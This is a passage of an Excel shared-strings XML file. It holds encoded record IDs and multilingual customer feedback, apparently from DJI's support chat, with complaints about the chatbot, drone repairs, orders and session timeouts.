        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>드론을</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>찾아주려는</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>사명감에</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>차있어요</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>어려운</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>과정을</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>잘</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>설명해서</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>이해가</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>되었어요</t>
    </r>
  </si>
  <si>
    <t>mRV1k3fWKMb9ksXUYnjy47y1BDBYMW6TwcSTg0ChLuU=</t>
  </si>
  <si>
    <t>9a0bf0adc5b659998cdebd0e07e16945</t>
  </si>
  <si>
    <t>|82509882701051636118865</t>
  </si>
  <si>
    <t>+LAa1O2moEiW11AJciibQqPQx2YWquzWq7KDfpiDwQ8=</t>
  </si>
  <si>
    <t xml:space="preserve">Nothing it was just great
</t>
  </si>
  <si>
    <t>Ar8PqTadTCovQK7OW+nnA8vlq0V3+eb7kp5R7swR+Ao=</t>
  </si>
  <si>
    <t>d146bfcd8287e0313b653826909ba3fa</t>
  </si>
  <si>
    <t>|82508236472055973140406</t>
  </si>
  <si>
    <t>JEMlA/TdxIznp7A5ZXzmN+MK3Ylh1H/6ciXbslGikks=</t>
  </si>
  <si>
    <t>actually give me useful information Im trying to find out why my transmitter stopped working</t>
  </si>
  <si>
    <t>HORxTVhv6iHGGAuGZhwrGu/dfsQvZGqIPHz5iBYDoug=</t>
  </si>
  <si>
    <t>68464efc99211d6d628a21b8fae12cb7</t>
  </si>
  <si>
    <t>|82506967615834680233095</t>
  </si>
  <si>
    <t>sEGcmE4tek0bSImXPMWOlg==</t>
  </si>
  <si>
    <t>impossible de trouver une réponse</t>
  </si>
  <si>
    <t>7eyKtpifekpZBR9N91CJpv7o4+PiIC8MO/oKMo8CKK8=</t>
  </si>
  <si>
    <t>2b0fca28566a5cbaa15e531e379960e7</t>
  </si>
  <si>
    <t>|82506323122577157610351</t>
  </si>
  <si>
    <t>OYsmbgUGWT44UzVil0jiaw==</t>
  </si>
  <si>
    <t>Un informazione.Con il dji Neo è possibile creare un waypoint con il controller Dji RCN3 ?Grazie</t>
  </si>
  <si>
    <t>NdnCStw/PF1ypYOqqdXwZ0GohPauDu2LXIx0EeT4YCQ=</t>
  </si>
  <si>
    <t>a26826269a208354ee5f7a822b482984</t>
  </si>
  <si>
    <t>|82506016370413447740893</t>
  </si>
  <si>
    <t>wiTHinNCfwltLlyXlY74NtYtgTbw5igHosVd62Tq31k=</t>
  </si>
  <si>
    <t>erst am ende nach einigem hin und her kam der hinweis auf die Zeiten der erreichbarkeit.</t>
  </si>
  <si>
    <t>POEqsVjQbXahT6fcgYSPgCNTpL7HREG6z/OIlEExQWQ=</t>
  </si>
  <si>
    <t>a94fb754e726267bdc778f6cef9d6871</t>
  </si>
  <si>
    <t>|82505596198206880147565</t>
  </si>
  <si>
    <t>7z3huubU3ToVHMGl7DOAZw==</t>
  </si>
  <si>
    <t xml:space="preserve">Your app knocked me out while I was typing my case info!   </t>
  </si>
  <si>
    <t>NefUeXRi+NJLBLoeDy40TR/7txEy1OnrD2RwC4i1srY=</t>
  </si>
  <si>
    <t>ca444174fa796dd59c3f12b5dccf0f8e</t>
  </si>
  <si>
    <t>ca_store1</t>
  </si>
  <si>
    <t>|82504928225185500214572</t>
  </si>
  <si>
    <t>NcLjl9YsCPqLEHI3GDO/+EQBGehg45xCj/7PRIKCdqI=</t>
  </si>
  <si>
    <t xml:space="preserve">it leaves you stranded, It's unintuitive, it's disjointed jumpting between devices. </t>
  </si>
  <si>
    <t>4brWVd0SX2X1kjcExWyul2SgoZX7cVcCRxVdHAE6rxQ=</t>
  </si>
  <si>
    <t>54132a9e41993b3c9bbd747b516d321b</t>
  </si>
  <si>
    <t>na_sp18</t>
  </si>
  <si>
    <t>|82503974454384082695264</t>
  </si>
  <si>
    <t>rYb+BBmQgsD4wrcaoxoBTw==</t>
  </si>
  <si>
    <t>i cant use my drone</t>
  </si>
  <si>
    <t>tXvA0Mt+r6ELgJSwV9FQxQluga6VYHEq5x0T34EpgLo=</t>
  </si>
  <si>
    <t>484df57cf926b4ddccabee3226f09919</t>
  </si>
  <si>
    <t>|82503730475651028689384</t>
  </si>
  <si>
    <t>GCgjs0FHRa9kU6cjFgREy7x/q8KtfEHC04NFTZJlxSc=</t>
  </si>
  <si>
    <t>Everything was perfect</t>
  </si>
  <si>
    <t>oUMesQZtF2WSy5ecLM4/pS8zL7XiuWDUqbfzQ66rSaY=</t>
  </si>
  <si>
    <t>45c207d13bf197dd3eecb3a5393268ec</t>
  </si>
  <si>
    <t>|82503218517376643844154</t>
  </si>
  <si>
    <t>MZPjkcHs8LfrC8KHDk+ed8PdSp0Mb85XXG1xYV5sTh8=</t>
  </si>
  <si>
    <t xml:space="preserve">i havent had any service
</t>
  </si>
  <si>
    <t>I5ewtFIVjgpiYJcZLr4lcw50aUHq2PfyB4IToJ8/CHU=</t>
  </si>
  <si>
    <t>cb56b9f8fb68bf92f3590ead949a1e86</t>
  </si>
  <si>
    <t>|82503929744063495098700</t>
  </si>
  <si>
    <t>G1SLK29gF36t9MzR6ExuvAkJcX5CAqpHXnNyWmd/AZ0=</t>
  </si>
  <si>
    <t xml:space="preserve">This does not seem to be working.
</t>
  </si>
  <si>
    <t>fy4v+g8uR8CQdPQbRgQ+LD/Lu/264y8UMlkMoAXZt1o=</t>
  </si>
  <si>
    <t>ac0758ea1016d9b8298489d9f21ea9e6</t>
  </si>
  <si>
    <t>|82502585368084007453627</t>
  </si>
  <si>
    <t>oi0X91vEGBy/yzIc7l74MTlxkKVTZGbfgoznV6jOmq0=</t>
  </si>
  <si>
    <t>I need help and this is not working</t>
  </si>
  <si>
    <t>o+xMsREz14/4A/arSVGmJlgnw9XpFETRP4Wsi5Ig+7Y=</t>
  </si>
  <si>
    <t>40e7d77c5647f0f4eeebdb0d4d0d8979</t>
  </si>
  <si>
    <t>|82501916936639955432657</t>
  </si>
  <si>
    <t>fLUEz4byRuhTYPE5izl+YD9ZVZIcgSIltoYIQxbl+JU=</t>
  </si>
  <si>
    <t>Doesn't  give me enough time to explain fully.</t>
  </si>
  <si>
    <t>gxscitxl8jUFj/cg/13KZAPjYARePC8WI4vtp5WHvG0=</t>
  </si>
  <si>
    <t>adb40fa34be9bbccea24c830e8373926</t>
  </si>
  <si>
    <t>|82501911840789833892831</t>
  </si>
  <si>
    <t>2× Not enough  time to explain in chat.</t>
  </si>
  <si>
    <t>c3bd42d64a085deb7928d0fa03ef70cd</t>
  </si>
  <si>
    <t>|82501839963938436182923</t>
  </si>
  <si>
    <t>ZFgXASLLZ5jYpaePDGViYf3BEpQ6uzoSAvBBKTKFGJo=</t>
  </si>
  <si>
    <t>Can you help me? I submitted the info for a flyaway report and have a registration number.</t>
  </si>
  <si>
    <t>5w5OqFTYzSTznXrgrGKDg8BEsofhJBYYJBQAqUqytVk=</t>
  </si>
  <si>
    <t>2b60afafc5ba9a5359509f1e999136d1</t>
  </si>
  <si>
    <t>|82501574948924191814629</t>
  </si>
  <si>
    <t>Uak7/RD/H1Pi0rcwOWDb6yEOL7yKHYvZ/vpQWDZniBw=</t>
  </si>
  <si>
    <t>Really?</t>
  </si>
  <si>
    <t>RyvJ0US5AzamJfiHwP+JHQ==</t>
  </si>
  <si>
    <t>9c3c35b36b86e76785ffa7be5689e34a</t>
  </si>
  <si>
    <t>|82500946410123382038671</t>
  </si>
  <si>
    <t>hohdzQgNS8fs2nZFdKwwLg==</t>
  </si>
  <si>
    <t xml:space="preserve">Wo ist meine  Bestellung dji osomo creatov 3 </t>
  </si>
  <si>
    <t>J37M0AqlE40aNUyocftgrUWkkGXTM0tFvy5W8guewa8=</t>
  </si>
  <si>
    <t>1c3b46cd56eeb70ce935607e82ee616c</t>
  </si>
  <si>
    <t>|82500548850877196732614</t>
  </si>
  <si>
    <t>ttgS53sXX5E8B2BufmjJv+a70YWJhYFIkqy5ugwCYFc=</t>
  </si>
  <si>
    <t>It needs to be taught to understand simple English.</t>
  </si>
  <si>
    <t>Xk9xO7bt2weJI2/drVrkwlWVYgbLQqovSHfgjCcoqwk=</t>
  </si>
  <si>
    <t>a8d3363a50f2932e73813301790e253a</t>
  </si>
  <si>
    <t>|82500684171152765165266</t>
  </si>
  <si>
    <t>blYmMVEojIk+Ravbxt8MyIZIR8yIWa5oLZzrGJQoCoI=</t>
  </si>
  <si>
    <t>Not g8ving the answer i neef</t>
  </si>
  <si>
    <t>vA6uHZMGuPMhbCHydyEhUK+X+qn2TMfZV8Ofx1F6y70=</t>
  </si>
  <si>
    <t>7057459b8646e0b22300a31e1527683b</t>
  </si>
  <si>
    <t>|82499464008798204520992</t>
  </si>
  <si>
    <t>BQd1US+smLfMOhN43rGb9Q==</t>
  </si>
  <si>
    <t>📩 Mensaje Profesional para DJI (ES / EN / 中文)
🇪🇸 Español
Estimado equipo de DJI,
Mi nombre es An</t>
  </si>
  <si>
    <t>KxWw7Zoj0SGdlgxMgJ9jIBVR3vNYV/jbDkHQUAZpyN4=</t>
  </si>
  <si>
    <t>0189deda6abb00b08c2e160e70db0274</t>
  </si>
  <si>
    <t>|82499243937457060926403</t>
  </si>
  <si>
    <t>3v4+K41dQyfMS5gf3ExsDA==</t>
  </si>
  <si>
    <t>DJI Mavic Pro Need to Buy about 5 Batteries straight from DJI. Please call me Bahamas 1-242-558-5071</t>
  </si>
  <si>
    <t>JcSp3s5oTBZcET3wifdVcLWBNRMBcHtwWcIlwtZuWnI=</t>
  </si>
  <si>
    <t>08625b584487a6031cbc1df00efb2ddd</t>
  </si>
  <si>
    <t>|82498080125114474798372</t>
  </si>
  <si>
    <t>pqbXW1Kxpy4NTJWguISsuA==</t>
  </si>
  <si>
    <t xml:space="preserve">actual solution would be great 
</t>
  </si>
  <si>
    <t>0lk+AJ/w0BmdJP0rADmNJfMg2Tu/ZR5IvsvkUY3tryA=</t>
  </si>
  <si>
    <t>d5443e2da107972a8dcaeb7a589b1ae1</t>
  </si>
  <si>
    <t>|82498002946543327593522</t>
  </si>
  <si>
    <t>aEv2mhSWxAylNPJlyzQ2MNIEhoROA156Lr+XfsWMEfU=</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry I was looking for the label but I can’t find it. Good service </t>
  </si>
  <si>
    <t>aN3OvOWMluRNabzz0VjcBSWlu/QmLQxLfQj/5JuAGX8=</t>
  </si>
  <si>
    <t>da3b25736132214e783af95ae418239e</t>
  </si>
  <si>
    <t>|82498786998902154278746</t>
  </si>
  <si>
    <t>sYktimIBreim5/T5OvxZCUrO+whZAkY+n2TiuNaOa2s=</t>
  </si>
  <si>
    <t>No help whatsoever, I hate being urged to use the chat function, and there was no person to help</t>
  </si>
  <si>
    <t>I5PaZpIhU/OrUfHu0bBYdT9DLU40KHLquV4XIHPxplM=</t>
  </si>
  <si>
    <t>05276dbdda2d2bf775f1f8d5bd81f6c5</t>
  </si>
  <si>
    <t>|82498790280596165575418</t>
  </si>
  <si>
    <t>s5chxZEuqy+ckw/pr7/Wo/V+svQieD8iWCvzr+Ep7lg=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>최종해결여부는</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>상담과정을</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>통해</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>잘</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>이해가</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>가능했습니다</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>f3Xkqio3YwX7o5nnic37Yp+7TmlXDSPMjNd3SRiEL/E=</t>
  </si>
  <si>
    <t>c2ec91a4a9e99723615b2824b0c927b4</t>
  </si>
  <si>
    <t>|82497560463385462551644</t>
  </si>
  <si>
    <t>EiPgpJC2eVlg5O5MtGSfew==</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>시스템</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>사용이</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>너무</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>어려움</t>
    </r>
  </si>
  <si>
    <t>vbJvfAtSiEXCalHz7tW31hXKjzux0ryXZHLLhnJ3AMQ=</t>
  </si>
  <si>
    <t>796277af48ab84de65f237c4e0d15b09</t>
  </si>
  <si>
    <t>|82497530466804898785861</t>
  </si>
  <si>
    <t>zDBcXtWq9zJjye06jkUUrPsGyeKLH87QdyZqpBOW0P0=</t>
  </si>
  <si>
    <t>Good day, I have a mini 3 and I have a problem with the driver update, I have version v1.13.15 and i</t>
  </si>
  <si>
    <t>BnngmBwc5419PrrYhbte5iyMTxcwFkTxsFc1LquXOrk=</t>
  </si>
  <si>
    <t>a7f2ead204122f5002c0b6cee3ac2db4</t>
  </si>
  <si>
    <t>|82499185919885445916621</t>
  </si>
  <si>
    <t>Swzne5gMhuH32GjwuptHIWTcaS/68EtJs9lzItElcFI=</t>
  </si>
  <si>
    <t>Hallo ist Propeller für mini 3 und mini 4 pro gleich???</t>
  </si>
  <si>
    <t>oVBdYLOdzALyMJkT1xqKwdaMsaWClV4CBb5awSaVl78=</t>
  </si>
  <si>
    <t>ceddc0698bf44ffe24fef9d5bad848d3</t>
  </si>
  <si>
    <t>en_login1</t>
  </si>
  <si>
    <t>|82497918920006393373707</t>
  </si>
  <si>
    <t>Yk2ukFKR6B96DaOWCOKRkA==</t>
  </si>
  <si>
    <t>how do I bypass the login</t>
  </si>
  <si>
    <t>n2zLjB9jw8uQokwjRg25RbwC4XLYcFOpJxMTfz0Ek3s=</t>
  </si>
  <si>
    <t>63f3386fdb2757ef688294c41df94107</t>
  </si>
  <si>
    <t>|82497374654959589661788</t>
  </si>
  <si>
    <t>80ayaYAgyiDunPFAUZ9oQyRjU2Pp2AfWwuXW1or+oiU=</t>
  </si>
  <si>
    <t>Hi</t>
  </si>
  <si>
    <t>9LTXBDN+qnm1PBEyjqMpJOiFzyp9QRomZGNO2Y1rM9E=</t>
  </si>
  <si>
    <t>f76aaeb5d461ec7478cc19857326d5dd</t>
  </si>
  <si>
    <t>|82499379285501835575733</t>
  </si>
  <si>
    <t>C8XArAXUd8e5sDCk9YukTRrndtoD/9quAOx+Qv7jPSw=</t>
  </si>
  <si>
    <t>Not helping anything</t>
  </si>
  <si>
    <t>+bX6M+UHm/bOmPirHQxwbTlUXfeGEH628eZM533syps=</t>
  </si>
  <si>
    <t>2c4fc6e9ef72c628fafb0c3c217ee245</t>
  </si>
  <si>
    <t>|82497689549848748147644</t>
  </si>
  <si>
    <t>AKUcYRIfxB1x6eZO55xJzA==</t>
  </si>
  <si>
    <t>J'ai besoin d'information sur la livraison de mon colis et rien ne me permet d'obtenir de l'aide</t>
  </si>
  <si>
    <t>RiVC08U9o6pqtA/n4c0zfrqnHMFy0NEYMQGeKvby7fw=</t>
  </si>
  <si>
    <t>15de73f572716dddf382d3e1aba8aa38</t>
  </si>
  <si>
    <t>|82497257570097009783968</t>
  </si>
  <si>
    <t>vHJkZuL3jy6EC4tdJIrVosR+hv0/c0F7mYka3bQpHUc=</t>
  </si>
  <si>
    <t>I was writing a goddamn message and you erased it to come up with this rating fuck you</t>
  </si>
  <si>
    <t>yH0rvWym9a0tKWjjeLANCWAK0CkpvZX0IOT115qYdlo=</t>
  </si>
  <si>
    <t>06bb651eb75ac8d74060fe93157abffa</t>
  </si>
  <si>
    <t>|82496759588869171591363</t>
  </si>
  <si>
    <t>1EKtCeH9cUgGKVMjYmZ3FtO7KcSVF1IDr6twA3o4EmQ=</t>
  </si>
  <si>
    <t>HELLO, i have activation erro</t>
  </si>
  <si>
    <t>Nojq3PNh/KJAI5SFCAfvTGVgR4LuDzEE7aVFxXQgU9I=</t>
  </si>
  <si>
    <t>e86c3316748cb8489e5369275c32e2fd</t>
  </si>
  <si>
    <t>|82496605271455914511099</t>
  </si>
  <si>
    <t>TGbgXl+Pumy3p19cNO8Y3Q==</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks unsure how to id this controller.  </t>
  </si>
  <si>
    <t>r8CuBRk89hhidV0oZNB0l6V9QR5gghqFQQ+fNI9K5JE=</t>
  </si>
  <si>
    <t>ffee59465f503e0e27afadc54b0fdaaf</t>
  </si>
  <si>
    <t>|82496199858906890323075</t>
  </si>
  <si>
    <t>WzKUxpr3r5u8PxRQsvaI5CbAz6nSSCv8PTX0LLJA23I=</t>
  </si>
  <si>
    <t xml:space="preserve">Interrupting my writing </t>
  </si>
  <si>
    <t>Y9ktvpbP9hrPL+zmZy8xg5RPVm3i6TLgnJxBXfzQmlg=</t>
  </si>
  <si>
    <t>f3b8a610b850ab3024e591d7d2da8b65</t>
  </si>
  <si>
    <t>|82495469265136225735343</t>
  </si>
  <si>
    <t>u83njOv8N9RgpRnOaVRepg==</t>
  </si>
  <si>
    <t xml:space="preserve">i have DJI Mavic pro, has gimball problem, attempted a service request, system not accepting my SN, </t>
  </si>
  <si>
    <t>Z8ifTmsuaw81Irhixt5sE5mzScIJBNY7bZZo7O0KbNs=</t>
  </si>
  <si>
    <t>7260336089786df5c61decf0ceb6b723</t>
  </si>
  <si>
    <t>|82494793940774486816083</t>
  </si>
  <si>
    <t>U60nN/hhx7AL3IRbk6I9zJX/oZZxWrdW2Kk6wyGVUD8=</t>
  </si>
  <si>
    <t>is the Osmo 7 pro compatible with the S24 ultra? Also, Osmo 7 Pro and the Osmo 7p are the same produ</t>
  </si>
  <si>
    <t>7AuqFeUE9ySXr/SZASRhRlhpLA4pk4qxPD0+NNI5k3g=</t>
  </si>
  <si>
    <t>9b229596d9d151a919acaa5db8e0e1c9</t>
  </si>
  <si>
    <t>|82492882434053747719975</t>
  </si>
  <si>
    <t>J56xGQzh6Y5OaO4NIlvRXw==</t>
  </si>
  <si>
    <t>The AI system is not good. Its like it was glitched and could not answer any questions at all.</t>
  </si>
  <si>
    <t>Mmf0ERw7r9LfDuEOMW2S9RRJThnp/ncmY6IfiqGnmBA=</t>
  </si>
  <si>
    <t>f1ce9e5b89ae328c56b376e7e66d0cc8</t>
  </si>
  <si>
    <t>|82493093647358519799765</t>
  </si>
  <si>
    <t>cH2CHnI/PvjLWnkhhL4t3A==</t>
  </si>
  <si>
    <t xml:space="preserve">Um lokale Richtlinien sich anzuschauen werde ich auf eine chinesische Seite geleitet. </t>
  </si>
  <si>
    <t>FILaqjnY41fEcVx9CVCajW7J0d51n8oREY08k1dnFG8=</t>
  </si>
  <si>
    <t>1395572066bc355072c5a3ffe7996293</t>
  </si>
  <si>
    <t>|82493033364849647310326</t>
  </si>
  <si>
    <t>4lM5ShoxrZ+D/N4MnhMECrsL6QsdN7pv//FZHjJQ7lk=</t>
  </si>
  <si>
    <t>I wish to submit the flight logs from case CAS-23515802-P4F6R0. Can I do that here?</t>
  </si>
  <si>
    <t>Dd4YTDELcnn8xTzKJV1Die+PuLGOg3ZyAN0/fQCAANU=</t>
  </si>
  <si>
    <t>a7a85daa6956d227610e012a153217f2</t>
  </si>
  <si>
    <t>|82493041001066967696761</t>
  </si>
  <si>
    <t>z/Pi5tNCWjHFOkyjAC1bVQ==</t>
  </si>
  <si>
    <t>If I have a service case number, where do I send my drone to get repaired?</t>
  </si>
  <si>
    <t>a1xdWfGIXp+J2H3orMYW1aPu9JaWfsnW42w62h+R04M=</t>
  </si>
  <si>
    <t>913ff69f6ee36862d85d38bef968905c</t>
  </si>
  <si>
    <t>|82491082493554501582037</t>
  </si>
  <si>
    <t>yO4qq+OAUL6/M8jvZWbXlGib4JRqPk5TvwI+8pZcVWc=</t>
  </si>
  <si>
    <t>I was typing a message to send and it automatically canceled and cleared my message because inactive</t>
  </si>
  <si>
    <t>+3VSleUhoy6tOUxhIS35X1FTJycWM1R8DdPVsyu5MNA=</t>
  </si>
  <si>
    <t>7671eaf0f73f1fece22a7b3917f92526</t>
  </si>
  <si>
    <t>|82491088665713768718503</t>
  </si>
  <si>
    <t>7RUps8VeDAORucQIIyhU1/v5SOAphm6msVYntJ9ljWk=</t>
  </si>
  <si>
    <t>it completely misinterpreted my prompt; fine-tune this machine further and test it before deploying</t>
  </si>
  <si>
    <t>Vba6m+dK1dFuFLyuZggIc8Hk/jm5O3hnrap6myV/z+Q=</t>
  </si>
  <si>
    <t>21340def2894f5ad5e7c4f2e29fa51af</t>
  </si>
  <si>
    <t>|82490703765937090854505</t>
  </si>
  <si>
    <t>访客-c1f563</t>
  </si>
  <si>
    <t>Leider nicht wirlich hilfreich - trotzdem danke für Ihre Teit. Telefonisch wäre das alles einfacher!</t>
  </si>
  <si>
    <t>7cde6dc075c5f04c9ea84dd0ae5a73d7</t>
  </si>
  <si>
    <t>608776787496acd6506c55e4a421a63f</t>
  </si>
  <si>
    <t>|82490622803704980392478</t>
  </si>
  <si>
    <t>b+putx26BRaI5T2ZOaTSV82TGBSF4saTqg7p5b0sd8Y=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>물에빠졌던</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>드론을</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>건져서</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>말리고</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>있는데</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>조종기</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>한개로</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
